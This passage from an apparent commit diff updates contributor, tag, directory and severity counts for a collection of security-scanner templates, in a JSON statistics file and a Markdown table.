crosser","count":31},{"name":"luisfelipe146","count":31},{"name":"ice3man","count":29},{"name":"mastercho","count":29},{"name":"pwnhxl","count":28},{"name":"organiccrap","count":24},{"name":"hardik-solanki","count":24},{"name":"techbrunchfr","count":23},{"name":"ctflearner","count":23},{"name":"harsh","count":23},{"name":"userdehghani","count":22},{"name":"ffffffff0x","count":22},{"name":"parthmalhotra","count":20},{"name":"kazgangap","count":19},{"name":"cckuailong","count":18},{"name":"sullo","count":18},{"name":"lu4nx","count":17},{"name":"bhutch","count":17},{"name":"shaikhyaser","count":16},{"name":"0xpugazh","count":16},{"name":"random-robbie","count":16},{"name":"unapibageek","count":15},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"tenbird","count":14},{"name":"milo2012","count":14},{"name":"dogasantos","count":14},{"name":"r3dg33k","count":14},{"name":"nullfuzz","count":13},{"name":"0ri2n","count":13},{"name":"sharath","count":13},{"name":"elsfa7110","count":13},{"name":"theabhinavgaur","count":13},{"name":"melbadry9","count":13},{"name":"suman_kar","count":12},{"name":"kazet","count":12},{"name":"meme-lord","count":12},{"name":"wdahlenb","count":11},{"name":"cyllective","count":11},{"name":"co5mos","count":10},{"name":"logicalhunter","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":10},{"name":"random_robbie","count":10},{"name":"0x240x23elu","count":10},{"name":"alph4byt3","count":10},{"name":"adamcrosser","count":9},{"name":"momika233","count":9},{"name":"olearycrew","count":9},{"name":"fabaff","count":9},{"name":"oppsec","count":9},{"name":"initstring","count":9},{"name":"emadshanab","count":9},{"name":"irshad ahamed","count":8},{"name":"noraj","count":8},{"name":"veshraj","count":8},{"name":"iamthefrogy","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"_0xf4n9x_","count":8},{"name":"caspergn","count":7},{"name":"dr_set","count":7},{"name":"its0x08","count":7},{"name":"divya_mudgal","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":7},{"name":"nodauf","count":7},{"name":"amit-jd","count":7},{"name":"randomstr1ng","count":7},{"name":"kophjager007","count":7},{"name":"techryptic (@tech)","count":7},{"name":"huta0","count":7},{"name":"harshbothra_","count":7},{"name":"tarunkoyalwar","count":7},{"name":"leovalcante","count":7},{"name":"ja1sh","count":6},{"name":"puzzlepeaches","count":6},{"name":"gitlab red team","count":6},{"name":"__fazal","count":6},{"name":"megamansec","count":6},{"name":"lucky0x0d","count":6},{"name":"forgedhallpass","count":6},{"name":"clem9669","count":6},{"name":"justaacat","count":6},{"name":"hahwul","count":6},{"name":"pathtaga","count":6},{"name":"devang-solanki","count":6},{"name":"evan rubinstein","count":6},{"name":"imnightmaree","count":6},{"name":"pentest_swissky","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"byt3bl33d3r","count":6},{"name":"xelkomy","count":6},{"name":"mr-xn","count":5},{"name":"r12w4n","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"s0obi","count":5},{"name":"defr0ggy","count":5},{"name":"gtrrnr","count":5},{"name":"vicrack","count":5},{"name":"your3cho","count":5},{"name":"podalirius","count":5},{"name":"r3naissance","count":5},{"name":"prajiteshsingh","count":5},{"name":"shine","count":5},{"name":"powerexploit","count":5},{"name":"pulsesecurity.co.nz","count":5},{"name":"kh4sh3i","count":5},{"name":"robotshell","count":5},{"name":"arm!tage","count":5},{"name":"andreluna","count":5},{"name":"joanbono","count":5},{"name":"panch0r3d","count":5},{"name":"e_schultze_","count":4},{"name":"dadevel","count":4},{"name":"k0pak4","count":4},{"name":"0xr2r","count":4},{"name":"3th1c_yuk1","count":4},{"name":"m4lwhere","count":4},{"name":"ggranjus","count":4},{"name":"wisnupramoedya","count":4},{"name":"tanq16","count":4},{"name":"shankar acharya","count":4},{"name":"king-alexander","count":4},{"name":"cookiehanhoan","count":4},{"name":"jpg0mez","count":4},{"name":"h1ei1","count":4},{"name":"iamnooob","count":4},{"name":"nybble04","count":4},{"name":"heeress","count":4},{"name":"flx","count":4},{"name":"scent2d","count":4},{"name":"xxcdd","count":4},{"name":"ice3man543","count":4},{"name":"incogbyte","count":4},{"name":"dolev farhi","count":4},{"name":"lum8rjack","count":4},{"name":"emenalf","count":3},{"name":"skeltavik","count":3},{"name":"taielab","count":3},{"name":"aringo","count":3},{"name":"lark-lab","count":3},{"name":"coldfish","count":3},{"name":"andydoering","count":3},{"name":"sushantkamble","count":3},{"name":"z3bd","count":3},{"name":"ph33r","count":3},{"name":"jarijaas","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"ekrause","count":3},{"name":"johnjhacking","count":3},{"name":"canberbamber","count":3},{"name":"cheesymoon","count":3},{"name":"j3ssie","count":3},{"name":"imjust0","count":3},{"name":"fyoorer","count":3},{"name":"parth","count":3},{"name":"e1a","count":3},{"name":"xianke","count":3},{"name":"swissky","count":3},{"name":"badboycxcc","count":3},{"name":"me9187","count":3},{"name":"vagnerd","count":3},{"name":"evergreencartoons","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"whoever","count":3},{"name":"dudez","count":3},{"name":"farish","count":3},{"name":"f1tz","count":3},{"name":"huowuzhao","count":3},{"name":"unstabl3","count":3},{"name":"true13","count":3},{"name":"alifathi-h1","count":3},{"name":"fxploit","count":3},{"name":"impramodsargar","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dr0pd34d","count":3},{"name":"c4sper0","count":3},{"name":"bernardofsr","count":3},{"name":"shifacyclewala","count":3},{"name":"mavericknerd","count":3},{"name":"matt galligan","count":3},{"name":"splint3r7","count":3},{"name":"binaryfigments","count":3},{"name":"salts","count":3},{"name":"lucasljm2001","count":3},{"name":"_generic_human_","count":3},{"name":"atomiczsec","count":3},{"name":"isacaya","count":3},{"name":"randomrobbie","count":3},{"name":"vsh00t","count":3},{"name":"arcc","count":3},{"name":"0w4ys","count":3},{"name":"davidmckennirey","count":3},{"name":"omranisecurity","count":3},{"name":"securityforeveryone","count":3},{"name":"ambassify","count":3},{"name":"0xrudra","count":2},{"name":"brenocss","count":2},{"name":"rafaelwdornelas","count":2},{"name":"manas_harsh","count":2},{"name":"streetofhackerr007","count":2},{"name":"kishore-hariram","count":2},{"name":"florianmaak","count":2},{"name":"clarkvoss","count":2},{"name":"danmcinerney","count":2},{"name":"herry","count":2},{"name":"ajaysenr","count":2},{"name":"dogancanbakir","count":2},{"name":"t3l3machus","count":2},{"name":"thabisocn","count":2},{"name":"convisoappsec","count":2},{"name":"raesene","count":2},{"name":"korteke","count":2},{"name":"y4er","count":2},{"name":"bing0o","count":2},{"name":"sascha brendel","count":2},{"name":"bananabr","count":2},{"name":"0xsapra","count":2},{"name":"v0idc0de","count":2},{"name":"ep1csage","count":2},{"name":"amirhossein raeisi","count":2},{"name":"thevillagehacker","count":2},{"name":"michal mikolas (nanuqcz)","count":2},{"name":"topscoder","count":2},{"name":"amsda","count":2},{"name":"h0j3n","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"geekby","count":2},{"name":"hetroublemakr","count":2},{"name":"bp0lr","count":2},{"name":"bmcel","count":2},{"name":"c3l3si4n","count":2},{"name":"usdag","count":2},{"name":"arliya","count":2},{"name":"charles d","count":2},{"name":"0xcrypto","count":2},{"name":"d4vy","count":2},{"name":"nuk3s3c","count":2},{"name":"w4cky_","count":2},{"name":"redteambrasil","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"ree4pwn","count":2},{"name":"charles d.","count":2},{"name":"udit_thakkur","count":2},{"name":"mohammedsaneem","count":2},{"name":"socketz","count":2},{"name":"supr4s","count":2},{"name":"6mile","count":2},{"name":"thezakman","count":2},{"name":"supras","count":2},{"name":"mzack9999","count":2},{"name":"martincodes-de","count":2},{"name":"zomsop82","count":2},{"name":"8arthur","count":2},{"name":"nkxxkn","count":2},{"name":"foulenzer","count":2},{"name":"paperpen","count":2},{"name":"serrapa","count":2},{"name":"ayadim","count":2},{"name":"maximus decimus","count":2},{"name":"joshlarsen","count":2},{"name":"codexlynx","count":2},{"name":"cckuakilong","count":2},{"name":"kiblyn11","count":2},{"name":"paradessia","count":2},{"name":"liwermor","count":2},{"name":"cocxanh","count":2},{"name":"lotusdll","count":2},{"name":"nvn1729","count":2},{"name":"sy3omda","count":2},{"name":"danielmofer","count":2},{"name":"ehsahil","count":2},{"name":"vavkamil","count":2},{"name":"pxmme1337","count":2},{"name":"shelled","count":2},{"name":"dahse89","count":2},{"name":"luci","count":2},{"name":"bsysop","count":2},{"name":"666asd","count":2},{"name":"afaq","count":2},{"name":"x1m_martijn","count":2},{"name":"kre80r","count":2},{"name":"joshua rogers","count":2},{"name":"parzival","count":2},{"name":"zy9ard3","count":2},{"name":"dheerajmadhukar","count":2},{"name":"msegoviag","count":2},{"name":"0xnirvana","count":2},{"name":"mrharshvardhan","count":2},{"name":"hackerarpan","count":2},{"name":"g4l1t0","count":2},{"name":"christianpoeschl","count":2},{"name":"myztique","count":2},{"name":"joeldeleep","count":2},{"name":"notnotnotveg","count":2},{"name":"0xsmiley","count":2},{"name":"wa1tf0rme","count":2},{"name":"n-thumann","count":2},{"name":"koti2","count":2},{"name":"0xelkomy","count":2},{"name":"k11h-de","count":2},{"name":"brucelsone","count":2},{"name":"randomdhiraj","count":2},{"name":"github.com/its0x08","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"davidegirardi","count":2},{"name":"dbrwsky","count":2},{"name":"pbuff07","count":2},{"name":"moritz nentwig","count":2},{"name":"lstatro","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"z0ne","count":2},{"name":"shankaracharya","count":2},{"name":"uomogrande","count":2},{"name":"gevakun","count":2},{"name":"egemenkochisarli","count":2},{"name":"thardt-praetorian","count":2},{"name":"sbani","count":2},{"name":"sinkettu","count":2},{"name":"gal nagli","count":2},{"name":"luqmaan hadia","count":1},{"name":"sanineng","count":1},{"name":"justmumu","count":1},{"name":"eremit4","count":1},{"name":"thebinitghimire","count":1},{"name":"rojanrijal","count":1},{"name":"ohlinge","count":1},{"name":"pratik khalane","count":1},{"name":"dorkerdevil","count":1},{"name":"amirmsafari","count":1},{"name":"ynnirc","count":1},{"name":"exid","count":1},{"name":"mchklt","count":1},{"name":"vinit989","count":1},{"name":"david botelho mariano","count":1},{"name":"retr02332","count":1},{"name":"none","count":1},{"name":"amanrawat","count":1},{"name":"yiran","count":1},{"name":"hanlaomo","count":1},{"name":"pepitoh","count":1},{"name":"becivells","count":1},{"name":"sec_hawk","count":1},{"name":"jbertman","count":1},{"name":"fq_hsu","count":1},{"name":"erethon","count":1},{"name":"ahmetpergamum","count":1},{"name":"mesaglio","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"jacalynli","count":1},{"name":"m0ck3d","count":1},{"name":"jonathanwalker","count":1},{"name":"berkdusunur","count":1},{"name":"xshuden","count":1},{"name":"vzamanillo","count":1},{"name":"0xparth","count":1},{"name":"notwhy","count":1},{"name":"alperenkesk","count":1},{"name":"qlkwej","count":1},{"name":"djoevanka","count":1},{"name":"revblock","count":1},{"name":"carrot2","count":1},{"name":"natto97","count":1},{"name":"shivampand3y","count":1},{"name":"babybash","count":1},{"name":"pudsec","count":1},{"name":"bugvsme","count":1},{"name":"ipanda","count":1},{"name":"kiransau","count":1},{"name":"francescocarlucci","count":1},{"name":"f0xy","count":1},{"name":"elmahdi","count":1},{"name":"compr00t","count":1},{"name":"dievus","count":1},{"name":"jbaines-r7","count":1},{"name":"abbas.heybati","count":1},{"name":"carson chan","count":1},{"name":"husain","count":1},{"name":"bjxsec","count":1},{"name":"tirtha_mandal","count":1},{"name":"sherlocksecurity","count":1},{"name":"phyr3wall","count":1},{"name":"esonhugh","count":1},{"name":"soyelmago","count":1},{"name":"infosecsanyam","count":1},{"name":"realexp3rt","count":1},{"name":"rinolock","count":1},{"name":"shockwave","count":1},{"name":"michal-mikolas","count":1},{"name":"lark lab","count":1},{"name":"palanichamy_perumal","count":1},{"name":"arqsz","count":1},{"name":"mabdullah22","count":1},{"name":"cravaterouge","count":1},{"name":"miryangjung","count":1},{"name":"ldionmarcil","count":1},{"name":"x6263","count":1},{"name":"b4uh0lz","count":1},{"name":"denandz","count":1},{"name":"ayadi","count":1},{"name":"p-l-","count":1},{"name":"daffianfo","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"lixts","count":1},{"name":"kiks7","count":1},{"name":"pphuahua","count":1},{"name":"sospiro","count":1},{"name":"adrianmf","count":1},{"name":"viondexd","count":1},{"name":"regala_","count":1},{"name":"kr1shna4garwal","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"1nf1n7y","count":1},{"name":"ruppde","count":1},{"name":"adnanekhan","count":1},{"name":"dabla","count":1},{"name":"bywalks","count":1},{"name":"kaizensecurity","count":1},{"name":"kresec","count":1},{"name":"juicypotato1","count":1},{"name":"elder tao","count":1},{"name":"lamscun","count":1},{"name":"stupidfish","count":1},{"name":"jfbes","count":1},{"name":"savik","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"sak1","count":1},{"name":"vikas kundu","count":1},{"name":"izn0u","count":1},{"name":"pjborah","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"knassar702","count":1},{"name":"patralos","count":1},{"name":"alexrydzak","count":1},{"name":"zn9988","count":1},{"name":"ndmalc","count":1},{"name":"w0tx","count":1},{"name":"s1r1us","count":1},{"name":"nuts7","count":1},{"name":"screamy","count":1},{"name":"jrolf","count":1},{"name":"ransomsec","count":1},{"name":"icarot","count":1},{"name":"hazana","count":1},{"name":"sorrowx3","count":1},{"name":"igibanez","count":1},{"name":"furkansayim","count":1},{"name":"narluin","count":1},{"name":"caon","count":1},{"name":"ap3r","count":1},{"name":"xc1ym","count":1},{"name":"remonsec","count":1},{"name":"millermedia","count":1},{"name":"duty_1g","count":1},{"name":"sdcampbell","count":1},{"name":"mlec","count":1},{"name":"notsoevilweasel","count":1},{"name":"ramkrishna sawant","count":1},{"name":"sshell","count":1},{"name":"aringo-bf","count":1},{"name":"iphantasmic","count":1},{"name":"0ut0fb4nd","count":1},{"name":"exploitation","count":1},{"name":"josecosta","count":1},{"name":"hotpot","count":1},{"name":"booboohq","count":1},{"name":"rodnt","count":1},{"name":"udinchan","count":1},{"name":"noah @thesubtlety","count":1},{"name":"naglis","count":1},{"name":"aravind","count":1},{"name":"skylark-lab","count":1},{"name":"kareemse1im","count":1},{"name":"colbyjack1134","count":1},{"name":"gonski","count":1},{"name":"metascan","count":1},{"name":"secthebit","count":1},{"name":"lingtren","count":1},{"name":"chesterblue","count":1},{"name":"tehtbl","count":1},{"name":"ritesh_gohil(#l4stpl4y3r)","count":1},{"name":"kabirsuda","count":1},{"name":"wabafet","count":1},{"name":"west-wise","count":1},{"name":"zandros0","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"mrcl0wnlab","count":1},{"name":"pry0cc","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"jaskaran","count":1},{"name":"willd96","count":1},{"name":"dk999","count":1},{"name":"technicaljunkie","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"f1she3","count":1},{"name":"shivanshkhari","count":1},{"name":"th3.d1p4k","count":1},{"name":"amnotacat","count":1},{"name":"af001","count":1},{"name":"retr0","count":1},{"name":"daviey","count":1},{"name":"ahmed abou-ela","count":1},{"name":"hakluke","count":1},{"name":"olewagner","count":1},{"name":"deena","count":1},{"name":"marcos_iaf","count":1},{"name":"jeya seelan","count":1},{"name":"rivalsec","count":1},{"name":"wlayzz","count":1},{"name":"floriandewald","count":1},{"name":"oscarintherocks","count":1},{"name":"jub0bs","count":1},{"name":"co0nan","count":1},{"name":"official_blackhat13","count":1},{"name":"xstp","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"numan türle","count":1},{"name":"thirukrishnan","count":1},{"name":"luciannitescu","count":1},{"name":"invisiblethreat","count":1},{"name":"th3r4id","count":1},{"name":"shreyapohekar","count":1},{"name":"bad5ect0r","count":1},{"name":"pwnwithlove","count":1},{"name":"0xceba","count":1},{"name":"udyz","count":1},{"name":"rschio","count":1},{"name":"r3nz0","count":1},{"name":"akokonunes","count":1},{"name":"brabbit10","count":1},{"name":"elouhi","count":1},{"name":"dhiyanesdk","count":1},{"name":"mihhailsokolov","count":1},{"name":"yusakie","count":1},{"name":"arall","count":1},{"name":"nytr0gen","count":1},{"name":"breno_css","count":1},{"name":"yavolo","count":1},{"name":"apt-mirror","count":1},{"name":"luskabol","count":1},{"name":"dwbzn","count":1},{"name":"omarkurt","count":1},{"name":"osamahamad","count":1},{"name":"gpiechnik2","count":1},{"name":"yuansec","count":1},{"name":"act1on3","count":1},{"name":"_darrenmartyn","count":1},{"name":"jeya.seelan","count":1},{"name":"k3rwin","count":1},{"name":"d0rkerdevil","count":1},{"name":"yaser_s","count":1},{"name":"jcockhren","count":1},{"name":"banana69","count":1},{"name":"aaronchen0","count":1},{"name":"droberson","count":1},{"name":"domenicoveneziano","count":1},{"name":"_harleo","count":1},{"name":"am0nt31r0","count":1},{"name":"win3zz","count":1},{"name":"rubina119","count":1},{"name":"jas37","count":1},{"name":"pdp","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"nerrorsec","count":1},{"name":"adilsoybali","count":1},{"name":"queencitycyber","count":1},{"name":"erikowen","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"dali","count":1},{"name":"qianbenhyu","count":1},{"name":"opencirt","count":1},{"name":"noobexploiter","count":1},{"name":"mantissts","count":1},{"name":"paper-pen","count":1},{"name":"nielsing","count":1},{"name":"lethargynavigator","count":1},{"name":"push4d","count":1},{"name":"jiheon-dev","count":1},{"name":"tim_koopmans","count":1},{"name":"spac3wh1te","count":1},{"name":"arjunchandarana","count":1},{"name":"mr.bobo hp","count":1},{"name":"axrk","count":1},{"name":"ky9oss","count":1},{"name":"2rs3c","count":1},{"name":"harryha","count":1},{"name":"0h1in9e","count":1},{"name":"0xcharan","count":1},{"name":"geraldino2","count":1},{"name":"hlop","count":1},{"name":"gboddin","count":1},{"name":"dale clarke","count":1},{"name":"unknown","count":1},{"name":"dawid-czarnecki","count":1},{"name":"petruknisme","count":1},{"name":"iampritam","count":1},{"name":"pussycat0","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"mubassirpatel","count":1},{"name":"mah3sec_","count":1},{"name":"couskito","count":1},{"name":"higor melgaço","count":1},{"name":"professorabhay","count":1},{"name":"flag007","count":1},{"name":"pascalheidmann","count":1},{"name":"wpsec","count":1},{"name":"sttlr","count":1},{"name":"anonymous","count":1},{"name":"dmartyn","count":1},{"name":"kurohost","count":1},{"name":"adamparsons","count":1},{"name":"intx0x80","count":1},{"name":"ola456","count":1},{"name":"irshadahamed","count":1},{"name":"liquidsec","count":1},{"name":"marcio mendes","count":1},{"name":"ramondunker","count":1},{"name":"apple","count":1},{"name":"0xh7ml","count":1},{"name":"shiva (strobes security)","count":1},{"name":"carlosvieira","count":1},{"name":"ph33rr","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"elitebaz","count":1},{"name":"0xceeb","count":1},{"name":"joaonevess","count":1},{"name":"sw0rk17","count":1},{"name":"0xteles","count":1},{"name":"5up3r541y4n","count":1},{"name":"omarjezi","count":1},{"name":"whynotke","count":1},{"name":"unblvr1","count":1},{"name":"michael wedl","count":1},{"name":"freakyclown","count":1},{"name":"noamrathaus","count":1},{"name":"httpvoid","count":1},{"name":"lady_bug","count":1},{"name":"mhdsamx","count":1},{"name":"puben","count":1},{"name":"luqman","count":1},{"name":"nagli","count":1},{"name":"diablo","count":1},{"name":"arr0way","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"b0yd","count":1},{"name":"y0no","count":1},{"name":"barthy.koeln","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"jadu101","count":1},{"name":"davidfegyver","count":1},{"name":"8authur","count":1},{"name":"akshansh","count":1},{"name":"aron molnar","count":1},{"name":"brianlam38","count":1},{"name":"ahmed sherif","count":1},{"name":"affix","count":1},{"name":"jaimin gondaliya","count":1},{"name":"juliosmelo","count":1},{"name":"hüseyin tintaş","count":1},{"name":"shelld3v","count":1},{"name":"mass0ma","count":1},{"name":"themiddle","count":1},{"name":"r3s ost","count":1},{"name":"fpatrik","count":1},{"name":"high","count":1},{"name":"tangxiaofeng7","count":1},{"name":"aresx","count":1},{"name":"sickwell","count":1},{"name":"zinminphy0","count":1},{"name":"sechunt3r","count":1},{"name":"yashanand155","count":1},{"name":"sicksec","count":1},{"name":"piyushchhiroliya","count":1},{"name":"drfabiocastro","count":1},{"name":"hateshape","count":1},{"name":"b0rn2r00t","count":1},{"name":"_c0wb0y_","count":1},{"name":"nobody","count":1},{"name":"mayank_pandey01","count":1},{"name":"zhenwarx","count":1},{"name":"unkl4b","count":1},{"name":"charanrayudu","count":1},{"name":"tirtha","count":1},{"name":"rotembar","count":1},{"name":"lrtk-coder","count":1},{"name":"undefl0w","count":1},{"name":"godfatherorwa","count":1},{"name":"mariam tariq","count":1},{"name":"majidmc2","count":1},{"name":"abdullahisik","count":1},{"name":"zsusac","count":1},{"name":"aayush vishnoi","count":1},{"name":"micha3lb3n","count":1},{"name":"0xrod","count":1},{"name":"akash.c","count":1},{"name":"open-sec","count":1},{"name":"jteles","count":1},{"name":"mammad_rahimzada","count":1},{"name":"hyunsoo-ds","count":1},{"name":"evolutionsec","count":1},{"name":"hakimkt","count":1},{"name":"byobin","count":1},{"name":"danfaizer","count":1},{"name":"alevsk","count":1},{"name":"aaban solutions","count":1},{"name":"tea","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"shiar","count":1},{"name":"thelicato","count":1},{"name":"phillipo","count":1},{"name":"kailashbohara","count":1},{"name":"chetgan","count":1},{"name":"j33n1k4","count":1},{"name":"makyotox","count":1},{"name":"fur1na","count":1},{"name":"therealtoastycat","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"defektive","count":1},{"name":"ledoubletake","count":1},{"name":"bjhulst","count":1},{"name":"vulnspace","count":1},{"name":"n0el4kls","count":1},{"name":"fopina","count":1},{"name":"furkansenan","count":1},{"name":"calumjelrick","count":1},{"name":"miroslavsotak","count":1},{"name":"archer","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"null_hypothesis","count":1},{"name":"jna1","count":1},{"name":"harshinsecurity","count":1},{"name":"galoget","count":1},{"name":"houdinis","count":1},{"name":"youngpope","count":1},{"name":"mordavid","count":1},{"name":"mukundbhuva","count":1},{"name":"hardik-rathod","count":1},{"name":"viniciuspereiras","count":1},{"name":"rotemreiss","count":1},{"name":"0xkayala","count":1},{"name":"orpheus","count":1},{"name":"ringo","count":1},{"name":"ok_bye_now","count":1},{"name":"xeldax","count":1},{"name":"blckraven","count":1},{"name":"evan rubinstien","count":1},{"name":"kchason","count":1},{"name":"kagamigawa","count":1},{"name":"absshax","count":1},{"name":"myst7ic","count":1},{"name":"manasmbellani","count":1},{"name":"napgh0st","count":1},{"name":"prettyboyaaditya","count":1},{"name":"christbowel","count":1},{"name":"alex","count":1},{"name":"0xd0ff9","count":1},{"name":"watchtowr","count":1},{"name":"guax1","count":1},{"name":"shifacyclewla","count":1},{"name":"0xprial","count":1},{"name":"rumble773","count":1},{"name":"manuelbua","count":1},{"name":"0xtavian","count":1},{"name":"danigoland","count":1},{"name":"jc175","count":1},{"name":"h4kux","count":1},{"name":"s1r1u5_","count":1},{"name":"exceed","count":1},{"name":"amir-h-fallahi","count":1},{"name":"schniggie","count":1},{"name":"hczdmr","count":1},{"name":"philippdelteil","count":1},{"name":"ofjaaah","count":1},{"name":"whotwagner","count":1},{"name":"failopen","count":1},{"name":"h4sh5","count":1},{"name":"ptonewreckin","count":1},{"name":"ilovebinbash","count":1},{"name":"bughuntersurya","count":1},{"name":"miguelsegoviagil","count":1},{"name":"yashgoti","count":1},{"name":"momen eldawakhly","count":1},{"name":"allenwest24","count":1},{"name":"imhunterand","count":1},{"name":"mbmy","count":1},{"name":"bartu utku sarp","count":1},{"name":"smaranchand","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"hexcat","count":1},{"name":"chron0x","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"cbadke","count":1},{"name":"drewvravick","count":1},{"name":"toufik-airane","count":1},{"name":"clment cruchet","count":1},{"name":"sinsinology","count":1},{"name":"borna nematzadeh","count":1},{"name":"ooooooo_q","count":1},{"name":"lbb","count":1},{"name":"un-fmunozs","count":1},{"name":"andirrahmani1","count":1},{"name":"w8ay","count":1},{"name":"zeyad azima","count":1},{"name":"andysvints","count":1},{"name":"xcapri","count":1},{"name":"d4ly","count":1},{"name":"petergrifin","count":1},{"name":"matt miller","count":1},{"name":"fmunozs","count":1},{"name":"mayankpandey01","count":1},{"name":"patrick pirker","count":1},{"name":"anon-artist","count":1},{"name":"ling","count":1},{"name":"unp4ck","count":1}],"directory":[{"name":"http","count":7547},{"name":"file","count":337},{"name":"workflows","count":191},{"name":"network","count":134},{"name":"cloud","count":99},{"name":"code","count":81},{"name":"javascript","count":60},{"name":"ssl","count":29},{"name":"dns","count":22},{"name":"dast","count":21},{"name":"headless","count":12},{"name":"cves.json","count":1},{"name":"contributors.json","count":1},{"name":"TEMPLATES-STATS.json","count":1},{"name":"passive","count":1}],"severity":[{"name":"info","count":3697},{"name":"high","count":1770},{"name":"medium","count":1528},{"name":"critical","count":1044},{"name":"low","count":265},{"name":"unknown","count":39}],"types":[{"name":"file","count":337},{"name":"dns","count":25}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 2073fbad17..0a0fd735c2 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,25 +1,25 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 2510 | dhiyaneshdk | 1322 | http | 7546 | info | 3697 | file | 337 | +| cve | 2511 | dhiyaneshdk | 1322 | http | 7547 | info | 3697 | file | 337 | | panel | 1157 | daffainfo | 865 | file | 337 | high | 1770 | dns | 25 | -| wordpress | 983 | dwisiswant0 | 803 | workflows | 191 | medium | 1528 | http | 2 | -| exposure | 948 | pussycat0x | 362 | network | 134 | critical | 1043 | | | +| wordpress | 983 | dwisiswant0 | 803 | workflows | 191 | medium | 1528 | | | +| exposure | 948 | pussycat0x | 362 | network | 134 | critical | 1044 | | | | xss | 911 | ritikchaddha | 354 | cloud | 99 | low | 265 | | | | wp-plugin | 852 | pikpikcu | 353 | code | 81 | unknown | 39 | | | | osint | 804 | pdteam | 297 | javascript | 60 | | | | | | tech | 686 | princechaddha | 269 | ssl | 29 | | | | | | lfi | 662 | ricardomaia | 232 | dns | 22 | | | | | | misconfig | 659 | geeknik | 231 | dast | 21 | | | | | -| edb | 599 | theamanrawat | 223 | headless | 12 | | | | | -| rce | 599 | r3y3r53 | 200 | TEMPLATES-STATS.json | 1 | | | | | -| packetstorm | 544 | 0x_akoko | 179 | contributors.json | 1 | | | | | -| wpscan | 502 | gy741 | 158 | passive | 1 | | | | | -| cve2021 | 491 | righettod | 149 | cves.json | 1 | | | | | +| rce | 600 | theamanrawat | 223 | headless | 12 | | | | | +| edb | 599 | r3y3r53 | 200 | passive | 1 | | | | | +| packetstorm | 544 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | +| wpscan | 502 | gy741 | 158 | cves.json | 1 | | | | | +| cve2021 | 491 | righettod | 149 | contributors.json | 1 | | | | | | cve2022 | 479 | rxerium | 142 | | | | | | | | wp | 426 | sleepingbag945 | 132 | | | | | | | | cve2023 | 380 | arafatansari | 118 | | | | | | | | unauth | 367 | tess | 109 | | | | | | | -| sqli | 364 | pdresearch | 83 | | | | | | | +| sqli | 364 | pdresearch | 84 | | | | | | | | file | 346 | iamnoooob | 69 | | | | | | | | authenticated | 343 | idealphase | 66 | | | | | | | | intrusive | 302 | madrobot | 65 | | | | | | | @@ -31,5477 +31,5477 @@ | oast | 222 | johnk3r | 42 | | | | | | | | config | 221 | edoardottt | 42 | | | | | | | | default-login | 216 | gaurang | 42 | | | | | | | -| top-200 | 215 | j4vaovo | 35 | | | | | | | -| osint-social | 210 | c-sh0 | 35 | | | | | | | +| top-200 | 215 | c-sh0 | 35 | | | | | | | +| osint-social | 210 | j4vaovo | 35 | | | | | | | | network | 195 | adam crosser | 31 | | | | | | | | token | 193 | luisfelipe146 | 31 | | | | | | | | apache | 191 | ice3man | 29 | | | | | | | | | 191 | mastercho | 29 | | | | | | | | devops | 177 | pwnhxl | 28 | | | | | | | -| cve2018 | 170 | organiccrap | 24 | | | | | | | -| iot | 167 | hardik-solanki | 24 | | | | | | | -| cve2019 | 164 | ctflearner | 23 | | | | | | | +| cve2018 | 170 | hardik-solanki | 24 | | | | | | | +| iot | 167 | organiccrap | 24 | | | | | | | +| cve2019 | 164 | techbrunchfr | 23 | | | | | | | | keys | 156 | harsh | 23 | | | | | | | -| joomla | 148 | techbrunchfr | 23 | | | | | | | -| install | 147 | userdehghani | 22 | | | | | | | -| malware | 142 | ffffffff0x | 22 | | | | | | | +| joomla | 148 | ctflearner | 23 | | | | | | | +| install | 147 | ffffffff0x | 22 | | | | | | | +| malware | 142 | userdehghani | 22 | | | | | | | | tcp | 136 | parthmalhotra | 20 | | | | | | | | redirect | 135 | kazgangap | 19 | | | | | | | -| aws | 134 | cckuailong | 18 | | | | | | | -| cloud | 134 | sullo | 18 | | | | | | | +| cloud | 134 | cckuailong | 18 | | | | | | | +| aws | 134 | sullo | 18 | | | 